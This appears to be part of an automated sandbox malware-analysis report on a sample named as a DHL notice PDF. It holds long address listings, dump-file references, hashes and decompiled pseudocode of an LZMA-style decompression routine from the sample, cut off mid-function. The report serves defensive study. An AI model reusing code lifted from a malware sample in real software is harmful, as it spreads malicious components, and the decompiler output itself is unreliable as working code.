                                                            0x0040740e
                                                            0x0040740e
                                                            0x00407410
                                                            0x004073e2
                                                            0x004073e2
                                                            0x004073f1
                                                            0x004073f5
                                                            0x004073f5
                                                            0x00407413
                                                            0x0040741a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040741c
                                                            0x0040741c
                                                            0x00407420
                                                            0x004075cf
                                                            0x00000000
                                                            0x004075cf
                                                            0x0040742c
                                                            0x00407433
                                                            0x0040743b
                                                            0x0040743b
                                                            0x0040743b
                                                            0x0040743e
                                                            0x00407441
                                                            0x00407441
                                                            0x00000000
                                                            0x00000000
                                                            0x00406d5f
                                                            0x00406d61
                                                            0x00406d64
                                                            0x00406dd5
                                                            0x00406dd8
                                                            0x00406ddb
                                                            0x00406de2
                                                            0x00406dec
                                                            0x00000000
                                                            0x00406dec
                                                            0x00406d66
                                                            0x00406d6a
                                                            0x00406d6d
                                                            0x00406d6f
                                                            0x00406d72
                                                            0x00406d75
                                                            0x00406d77
                                                            0x00406d7a
                                                            0x00406d7c
                                                            0x00406d81
                                                            0x00406d84
                                                            0x00406d87
                                                            0x00406d8b
                                                            0x00406d92
                                                            0x00406d95
                                                            0x00406d9c
                                                            0x00406da0
                                                            0x00406da8
                                                            0x00406da8
                                                            0x00406da8
                                                            0x00406da2
                                                            0x00406da2
                                                            0x00406da2
                                                            0x00406d97
                                                            0x00406d97
                                                            0x00406d97
                                                            0x00406dac
                                                            0x00406daf
                                                            0x00406dcd
                                                            0x00406dcf
                                                            0x00000000
                                                            0x00406dcf
                                                            0x00406db1
                                                            0x00406db4
                                                            0x00406db7
                                                            0x00406dba
                                                            0x00406dbc
                                                            0x00406dbc
                                                            0x00406dbc
                                                            0x00406dbf
                                                            0x00406dc2
                                                            0x00406dc4
                                                            0x00406dc5
                                                            0x00406dc8
                                                            0x00000000
                                                            0x00000000
                                                            0x00406ffe
                                                            0x00407002
                                                            0x00407020
                                                            0x00407023
                                                            0x0040702a
                                                            0x0040702d
                                                            0x00407030
                                                            0x00407033
                                                            0x00407036
                                                            0x00407039
                                                            0x0040703b
                                                            0x00407042
                                                            0x00407043
                                                            0x00407045
                                                            0x00407048
                                                            0x0040704b
                                                            0x0040704e
                                                            0x0040704e
                                                            0x00407053
                                                            0x00000000
                                                            0x00407053
                                                            0x00407004
                                                            0x00407007
                                                            0x0040700a
                                                            0x00407014
                                                            0x00000000
                                                            0x00000000
                                                            0x00407068
                                                            0x0040706c
                                                            0x0040708f
                                                            0x00407092
                                                            0x00407095
                                                            0x0040709f
                                                            0x0040706e
                                                            0x0040706e
                                                            0x00407071
                                                            0x00407074
                                                            0x00407077
                                                            0x00407084
                                                            0x00407087
                                                            0x00407087
                                                            0x00000000
                                                            0x00000000
                                                            0x004070ab
                                                            0x004070af
                                                            0x00000000
                                                            0x00000000
                                                            0x004070b5
                                                            0x004070b9
                                                            0x00000000
                                                            0x00000000
                                                            0x004070bf
                                                            0x004070c1
                                                            0x004070c5
                                                            0x004070c5
                                                            0x004070c8
                                                            0x004070cc
                                                            0x00000000
                                                            0x00000000
                                                            0x0040711c
                                                            0x00407120
                                                            0x00407127
                                                            0x0040712a
                                                            0x0040712d
                                                            0x00407137
                                                            0x00000000
                                                            0x00407137
                                                            0x00407122
                                                            0x00000000
                                                            0x00000000
                                                            0x00407143
                                                            0x00407147
                                                            0x0040714e
                                                            0x00407151
                                                            0x00407154
                                                            0x00407149
                                                            0x00407149
                                                            0x00407149
                                                            0x00407157
                                                            0x0040715a
                                                            0x0040715d
                                                            0x0040715d
                                                            0x00407160
                                                            0x00407163
                                                            0x00407166
                                                            0x00407166
                                                            0x00407169
                                                            0x00407170
                                                            0x00407175
                                                            0x00000000
                                                            0x00000000
                                                            0x00407203
                                                            0x00407203
                                                            0x00407207
                                                            0x004075a5
                                                            0x00000000
                                                            0x004075a5
                                                            0x0040720d
                                                            0x00407210
                                                            0x00407213
                                                            0x00407217
                                                            0x0040721a
                                                            0x00407220
                                                            0x00407222
                                                            0x00407222
                                                            0x00407222
                                                            0x00407225
                                                            0x00407228
                                                            0x00000000
                                                            0x00000000
                                                            0x00406df8
                                                            0x00406df8
                                                            0x00406dfc
                                                            0x00407569
                                                            0x00000000
                                                            0x00407569
                                                            0x00406e02
                                                            0x00406e05
                                                            0x00406e08
                                                            0x00406e0c
                                                            0x00406e0f
                                                            0x00406e15
                                                            0x00406e17
                                                            0x00406e17
                                                            0x00406e17
                                                            0x00406e1a
                                                            0x00406e1d
                                                            0x00406e1d
                                                            0x00406e20
                                                            0x00406e23
                                                            0x00000000
                                                            0x00000000
                                                            0x00406e29
                                                            0x00406e2f
                                                            0x00000000
                                                            0x00000000
                                                            0x00406e35
                                                            0x00406e35
                                                            0x00406e39
                                                            0x00406e3c
                                                            0x00406e3f
                                                            0x00406e42
                                                            0x00406e45
                                                            0x00406e46
                                                            0x00406e49
                                                            0x00406e4b
                                                            0x00406e51
                                                            0x00406e54
                                                            0x00406e57
                                                            0x00406e5a
                                                            0x00406e5d
                                                            0x00406e60
                                                            0x00406e63
                                                            0x00406e7f
                                                            0x00406e82
                                                            0x00406e85
                                                            0x00406e88
                                                            0x00406e8f
                                                            0x00406e93
                                                            0x00406e95
                                                            0x00406e99
                                                            0x00406e65
                                                            0x00406e65
                                                            0x00406e69
                                                            0x00406e71
                                                            0x00406e76
                                                            0x00406e78
                                                            0x00406e7a
                                                            0x00406e7a
                                                            0x00406e9c
                                                            0x00406ea3
                                                            0x00406ea6
                                                            0x00000000
                                                            0x00406eac
                                                            0x00000000
                                                            0x00406eac
                                                            0x00000000
                                                            0x00406eb1
                                                            0x00406eb1
                                                            0x00406eb5
                                                            0x00407575
                                                            0x00000000
                                                            0x00407575
                                                            0x00406ebb
                                                            0x00406ebe
                                                            0x00406ec1
                                                            0x00406ec5
                                                            0x00406ec8
                                                            0x00406ece
                                                            0x00406ed0
                                                            0x00406ed0
                                                            0x00406ed0
                                                            0x00406ed3
                                                            0x00406ed6
                                                            0x00406ed6
                                                            0x00406ed6
                                                            0x00406edc
                                                            0x00000000
                                                            0x00000000
                                                            0x00406ede
                                                            0x00406ee1
                                                            0x00406ee4
                                                            0x00406ee7
                                                            0x00406eea
                                                            0x00406eed
                                                            0x00406ef0
                                                            0x00406ef3
                                                            0x00406ef6
                                                            0x00406ef9
                                                            0x00406efc
                                                            0x00406f14
                                                            0x00406f17
                                                            0x00406f1a
                                                            0x00406f1d
                                                            0x00406f1d
                                                            0x00406f20
                                                            0x00406f24
                                                            0x00406f26
                                                            0x00406efe
                                                            0x00406efe
                                                            0x00406f06
                                                            0x00406f0b
                                                            0x00406f0d
                                                            0x00406f0f
                                                            0x00406f0f
                                                            0x00406f29
                                                            0x00406f30
                                                            0x00406f33
                                                            0x00000000
                                                            0x00406f35
                                                            0x00000000
                                                            0x00406f35
                                                            0x00406f33
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00000000
                                                            0x00000000
                                                            0x00406f75
                                                            0x00406f75
                                                            0x00406f79
                                                            0x00407581
                                                            0x00000000
                                                            0x00407581
                                                            0x00406f7f
                                                            0x00406f82
                                                            0x00406f85
                                                            0x00406f89
                                                            0x00406f8c
                                                            0x00406f92
                                                            0x00406f94
                                                            0x00406f94
                                                            0x00406f94
                                                            0x00406f97
                                                            0x00406f9a
                                                            0x00406f9a
                                                            0x00406fa0
                                                            0x00406f3e
                                                            0x00406f3e
                                                            0x00406f41
                                                            0x00000000
                                                            0x00406f41
                                                            0x00406fa2
                                                            0x00406fa2
                                                            0x00406fa5
                                                            0x00406fa8
                                                            0x00406fab
                                                            0x00406fae
                                                            0x00406fb1
                                                            0x00406fb4
                                                            0x00406fb7
                                                            0x00406fba
                                                            0x00406fbd
                                                            0x00406fc0
                                                            0x00406fd8
                                                            0x00406fdb
                                                            0x00406fde
                                                            0x00406fe1
                                                            0x00406fe1
                                                            0x00406fe4
                                                            0x00406fe8
                                                            0x00406fea
                                                            0x00406fc2
                                                            0x00406fc2
                                                            0x00406fca
                                                            0x00406fcf
                                                            0x00406fd1
                                                            0x00406fd3
                                                            0x00406fd3
                                                            0x00406fed
                                                            0x00406ff4
                                                            0x00406ff7
                                                            0x00000000
                                                            0x00406ff9
                                                            0x00000000
                                                            0x00406ff9
                                                            0x00000000
                                                            0x00407286
                                                            0x00407286
                                                            0x0040728a
                                                            0x004075b1
                                                            0x00000000
                                                            0x004075b1
                                                            0x00407290
                                                            0x00407293
                                                            0x00407296
                                                            0x0040729a
                                                            0x0040729d
                                                            0x004072a3
                                                            0x004072a5
                                                            0x004072a5
                                                            0x004072a5
                                                            0x004072a8
                                                            0x00000000
                                                            0x00000000
                                                            0x00407056
                                                            0x00407056
                                                            0x00407059
                                                            0x00000000
                                                            0x00000000
                                                            0x00407395
                                                            0x00407399
                                                            0x004073bb
                                                            0x004073be
                                                            0x004073c8
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00000000
                                                            0x004073cb
                                                            0x0040739b
                                                            0x0040739e
                                                            0x004073a2
                                                            0x004073a5
                                                            0x004073a5
                                                            0x004073a8
                                                            0x00000000
                                                            0x00000000
                                                            0x00407452
                                                            0x00407456
                                                            0x00407474
                                                            0x00407474
                                                            0x00407474
                                                            0x0040747b
                                                            0x00407482
                                                            0x00407489
                                                            0x00407489
                                                            0x00000000
                                                            0x00407489
                                                            0x00407458
                                                            0x0040745b
                                                            0x0040745e
                                                            0x00407461
                                                            0x00407468
                                                            0x004073ac
                                                            0x004073ac
                                                            0x004073af
                                                            0x00000000
                                                            0x00000000
                                                            0x00407543
                                                            0x00407546
                                                            0x00000000
                                                            0x00000000
                                                            0x0040717d
                                                            0x0040717f
                                                            0x00407186
                                                            0x00407187
                                                            0x00407189
                                                            0x0040718c
                                                            0x00000000
                                                            0x00000000
                                                            0x00407194
                                                            0x00407197
                                                            0x0040719a
                                                            0x0040719c
                                                            0x0040719e
                                                            0x0040719e
                                                            0x0040719f
                                                            0x004071a2
                                                            0x004071a9
                                                            0x004071ac
                                                            0x004071ba
                                                            0x00000000
                                                            0x00000000
                                                            0x00407490
                                                            0x00407490
                                                            0x00407493
                                                            0x0040749a
                                                            0x00000000
                                                            0x00000000
                                                            0x0040749f
                                                            0x0040749f
                                                            0x004074a3
                                                            0x004075db
                                                            0x00000000
                                                            0x004075db
                                                            0x004074a9
                                                            0x004074ac
                                                            0x004074af
                                                            0x004074b3
                                                            0x004074b6
                                                            0x004074bc
                                                            0x004074be
                                                            0x004074be
                                                            0x004074be
                                                            0x004074c1
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c7
                                                            0x004074c7
                                                            0x004074cb
                                                            0x0040752b
                                                            0x0040752e
                                                            0x00407533
                                                            0x00407534
                                                            0x00407536
                                                            0x00407538
                                                            0x0040753b
                                                            0x00407447
                                                            0x00407447
                                                            0x00000000
                                                            0x00407447
                                                            0x004074cd
                                                            0x004074d3
                                                            0x004074d6
                                                            0x004074d9
                                                            0x004074dc
                                                            0x004074df
                                                            0x004074e2
                                                            0x004074e5
                                                            0x004074e8
                                                            0x004074eb
                                                            0x004074ee
                                                            0x00407507
                                                            0x0040750a
                                                            0x0040750d
                                                            0x00407510
                                                            0x00407514
                                                            0x00407516
                                                            0x00407516
                                                            0x00407517
                                                            0x0040751a
                                                            0x004074f0
                                                            0x004074f0
                                                            0x004074f8
                                                            0x004074fd
                                                            0x004074ff
                                                            0x00407502
                                                            0x00407502
                                                            0x0040751d
                                                            0x00407524
                                                            0x00000000
                                                            0x00407526
                                                            0x00000000
                                                            0x00407526
                                                            0x00000000
                                                            0x004071c2
                                                            0x004071c5
                                                            0x004071fb
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732e
                                                            0x0040732e
                                                            0x00407331
                                                            0x00407333
                                                            0x004075bd
                                                            0x00000000
                                                            0x004075bd
                                                            0x00407339
                                                            0x0040733c
                                                            0x00000000
                                                            0x00000000
                                                            0x00407342
                                                            0x00407346
                                                            0x00407349
                                                            0x00407349
                                                            0x00407349
                                                            0x00000000
                                                            0x00407349
                                                            0x004071c7
                                                            0x004071c9
                                                            0x004071cb
                                                            0x004071cd
                                                            0x004071d0
                                                            0x004071d1
                                                            0x004071d3
                                                            0x004071d5
                                                            0x004071d8
                                                            0x004071db
                                                            0x004071f1
                                                            0x004071f6
                                                            0x0040722e
                                                            0x0040722e
                                                            0x00407232
                                                            0x0040725e
                                                            0x00407260
                                                            0x00407267
                                                            0x0040726a
                                                            0x0040726d
                                                            0x0040726d
                                                            0x00407272
                                                            0x00407272
                                                            0x00407274
                                                            0x00407277
                                                            0x0040727e
                                                            0x00407281
                                                            0x004072ae
                                                            0x004072ae
                                                            0x004072b1
                                                            0x004072b4
                                                            0x00407328
                                                            0x00407328
                                                            0x00407328
                                                            0x00000000
                                                            0x00407328
                                                            0x004072b6
                                                            0x004072bc
                                                            0x004072bf
                                                            0x004072c2
                                                            0x004072c5
                                                            0x004072c8
                                                            0x004072cb
                                                            0x004072ce
                                                            0x004072d1
                                                            0x004072d4
                                                            0x004072d7
                                                            0x004072f0
                                                            0x004072f2
                                                            0x004072f5
                                                            0x004072f6
                                                            0x004072f9
                                                            0x004072fb
                                                            0x004072fe
                                                            0x00407300
                                                            0x00407302
                                                            0x00407305
                                                            0x00407307
                                                            0x0040730a
                                                            0x0040730e
                                                            0x00407310
                                                            0x00407310
                                                            0x00407311
                                                            0x00407314
                                                            0x00407317
                                                            0x004072d9
                                                            0x004072d9
                                                            0x004072e1
                                                            0x004072e6
                                                            0x004072e8
                                                            0x004072eb
                                                            0x004072eb
                                                            0x0040731a
                                                            0x00407321
                                                            0x004072ab
                                                            0x004072ab
                                                            0x004072ab
                                                            0x004072ab
                                                            0x00000000
                                                            0x00407323
                                                            0x00000000
                                                            0x00407323
                                                            0x00407321
                                                            0x00407234
                                                            0x00407237
                                                            0x00407239
                                                            0x0040723c
                                                            0x0040723f
                                                            0x00407242
                                                            0x00407244
                                                            0x00407247
                                                            0x0040724a
                                                            0x0040724a
                                                            0x0040724d
                                                            0x0040724d
                                                            0x00407250
                                                            0x00407257
                                                            0x0040722b
                                                            0x0040722b
                                                            0x0040722b
                                                            0x0040722b
                                                            0x00000000
                                                            0x00407259
                                                            0x00000000
                                                            0x00407259
                                                            0x00407257
                                                            0x004071dd
                                                            0x004071e0
                                                            0x004071e2
                                                            0x004071e5
                                                            0x00000000
                                                            0x00000000
                                                            0x00406f44
                                                            0x00406f44
                                                            0x00406f48
                                                            0x0040758d
                                                            0x00000000
                                                            0x0040758d
                                                            0x00406f4e
                                                            0x00406f51
                                                            0x00406f54
                                                            0x00406f57
                                                            0x00406f5a
                                                            0x00406f5d
                                                            0x00406f60
                                                            0x00406f62
                                                            0x00406f65
                                                            0x00406f68
                                                            0x00406f6b
                                                            0x00406f6d
                                                            0x00406f6d
                                                            0x00406f6d
                                                            0x00000000
                                                            0x00000000
                                                            0x004070cf
                                                            0x004070cf
                                                            0x004070d3
                                                            0x00407599
                                                            0x00000000
                                                            0x00407599
                                                            0x004070d9
                                                            0x004070dc
                                                            0x004070df
                                                            0x004070e2
                                                            0x004070e4
                                                            0x004070e4
                                                            0x004070e4
                                                            0x004070e7
                                                            0x004070ea
                                                            0x004070ed
                                                            0x004070f0
                                                            0x004070f3
                                                            0x004070f6
                                                            0x004070f7
                                                            0x004070f9
                                                            0x004070f9
                                                            0x004070f9
                                                            0x004070fc
                                                            0x004070ff
                                                            0x00407102
                                                            0x00407105
                                                            0x00407105
                                                            0x00407105
                                                            0x00407108
                                                            0x0040710a
                                                            0x0040710a
                                                            0x00000000
                                                            0x00000000
                                                            0x0040734c
                                                            0x0040734c
                                                            0x0040734c
                                                            0x00407350
                                                            0x00000000
                                                            0x00000000
                                                            0x00407356
                                                            0x00407359
                                                            0x0040735c
                                                            0x0040735f
                                                            0x00407361
                                                            0x00407361
                                                            0x00407361
                                                            0x00407364
                                                            0x00407367
                                                            0x0040736a
                                                            0x0040736d
                                                            0x00407370
                                                            0x00407373
                                                            0x00407374
                                                            0x00407376
                                                            0x00407376
                                                            0x00407376
                                                            0x00407379
                                                            0x0040737c
                                                            0x0040737f
                                                            0x00407382
                                                            0x00407385
                                                            0x00407389
                                                            0x0040738b
                                                            0x0040738e
                                                            0x00000000
                                                            0x00407390
                                                            0x0040710d
                                                            0x0040710d
                                                            0x00000000
                                                            0x0040710d
                                                            0x0040738e
                                                            0x004075c3
                                                            0x004075e5
                                                            0x004075eb
                                                            0x004075ed
                                                            0x004075f4
                                                            0x00000000
                                                            0x00000000
                                                            0x00406bf2
                                                            0x004075fa
                                                            0x004075fa
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                            • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                            • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                            • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 98%
                                                            			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
